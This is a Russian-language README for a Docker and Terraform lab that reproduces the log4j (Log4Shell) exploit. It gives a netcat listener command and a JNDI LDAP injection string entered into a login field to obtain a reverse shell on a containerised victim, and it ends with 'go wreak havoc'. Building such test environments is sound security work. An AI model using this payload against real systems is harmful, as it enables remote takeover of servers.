
Terraform и Docker ресурсы для быстрого развертывания теста CVE-2021-44428
Этот репозиторий настроен для быстрого тестирования уязвимости log4j с использованием Docker и Hashicorp Terraform. Все компоненты этого теста будут запущены в Docker-контейнерах в сети Docker, доступной через 'host.docker.internal'.
Эта тестовая среда основана на отличной статье из блога Raxis: (https://raxis.com/blog/log4j-exploit)
Уязвимое приложение и код эксплойта взяты у cyberxml (https://github.com/cyberxml/log4j-poc).
Всё, что я сделал, — это формализовал среду, чтобы было легко развернуть и протестировать этот восхитительный эксплойт.
Я не несу никакой ответственности за неблагоприятные последствия или вредоносные действия, которые могут возникнуть в результате использования материалов из этого репозитория. Точка. Решать, заслуживают ли эти материалы доверия, предстоит вам, и точно так же на вас лежит ответственность за этичное использование этой информации. Я лишь публикую эти материалы, чтобы исследователи, студенты и специалисты по безопасности могли быстро создать среду и протестировать эксплойт самостоятельно. Seacrest out.
Подключитесь к оболочке контейнера log4j_netcat с помощью 'docker exec -it netcat /bin/bash' или аналогичной команды. Именно здесь вы получите своё shell-подключение к серверу-жертве после его установления.
В своей сессии внутри контейнера log4j_netcat введите следующую команду, чтобы запустить прослушиватель:
nc -lv -s 0.0.0.0 -p 9001
В браузере перейдите по адресу http://host.docker.internal:8080/log4shell/
Введите следующее в поле 'Username', а в поле 'Password' — всё, что угодно:
${jndi:ldap://host.docker.internal:1389/a}
Вернитесь к оболочке контейнера log4j_netcat и убедитесь, что вы подключились к серверу-жертве.
Идите и творите хаос!